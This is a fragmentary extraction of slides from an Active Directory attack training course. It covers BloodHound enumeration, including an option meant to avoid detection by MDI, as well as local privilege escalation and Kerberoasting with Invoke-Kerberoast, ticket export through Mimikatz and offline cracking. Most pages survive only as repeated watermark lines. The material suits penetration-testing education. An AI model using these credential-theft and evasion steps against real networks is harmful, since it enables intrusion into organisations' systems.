All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 42


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Domain Enumeration - BloodHound


• Useful tool for Penetration Testers and Blue teams.
• Provides GUI for AD entities and relationships for the data collected by
its ingestors.
• Uses Graph Theory for providing the capability of mapping shortest path
for interesting things like Domain Admins.
• There are built-in queries for frequently used actions.
• Also supports custom Cypher queries.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 43

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 43


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Domain Enumeration - BloodHound


• Run Ingestors\Collectors using PowerShell or C#:
. C:\AD\Tools\BloodHound-
master\Collectors\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
or
SharpHound.exe
• The generated files can be uploaded to the BloodHound application.
• To avoid tools (like MDI) that alert on session enumeration on DCs
Invoke-BloodHound -CollectionMethod All
-ExcludeDomainControllers

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 44

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 44


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 54


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Find-GPOComputerAdmin -OUName
'OU=Mgmt,DC=us,DC=techcorp,DC=local'
Above command from the older PowerView version works fine

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 60


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/access-
control-model

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/interaction-
between-threads-and-securable-objects

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/dacls-and-
aces

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Active Directory Rights: https://msdn.microsoft.com/en-


us/library/system.directoryservices.activedirectoryrights(v=vs.110).aspx
Extended Rights: https://technet.microsoft.com/en-us/library/ff405676.aspx

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 67


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Reference: https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 79


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Privilege Escalation
• In an AD environment, there are multiple scenarios which lead to privilege escalation. We had a look
at the following
– Hunting for Local Admin access on other machines
– Hunting for high privilege domain accounts (like a Domain Administrator)
• Let's also look for Local Privilege Escalation.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 85

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 85


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

NTLM Relaying example - https://github.com/antonioCoco/RemotePotato0

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 86


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 89


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 90

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 90


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 94


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Privilege Escalation
• Let's start actively looking for ability to access other users or machines in the domain. This will be a
mix of Privilege escalation, Admin Recon and Lateral movement.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 99

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 99


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 101


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%
20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-
%20Tim%20Medin%281%29.pdf

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 102


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 103


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Request a ticket using .NET classes


Add-Type -AssemblyNAme System.IdentityModel
New-Object
System.IdentityModel.Tokens.KerberosRequestorSecurity
Token -ArgumentList "USSvc/serviceaccount"

Invoke-Kerberoast from BC Empire (https://github.com/BC-SECURITY/Empire)


can be used as well for cracking with John or Hashcat.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -Identity serviceaccount

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Crack ticket using tgsrepcrack


Check if the ticket has been granted
klist.exe
Export all tickets using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'
Crack the Service account password
python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt
'.\2-40a10000-studentuser@USSvc~serviceaccount-
US.TECHCORP.LOCAL.kirbi'

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 107


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Reference: http://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 108


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 109


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 110


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 111


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 112


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

LAPS intro: https://docs.microsoft.com/en-us/previous-


versions/mt227395(v=msdn.10)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 113


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 114


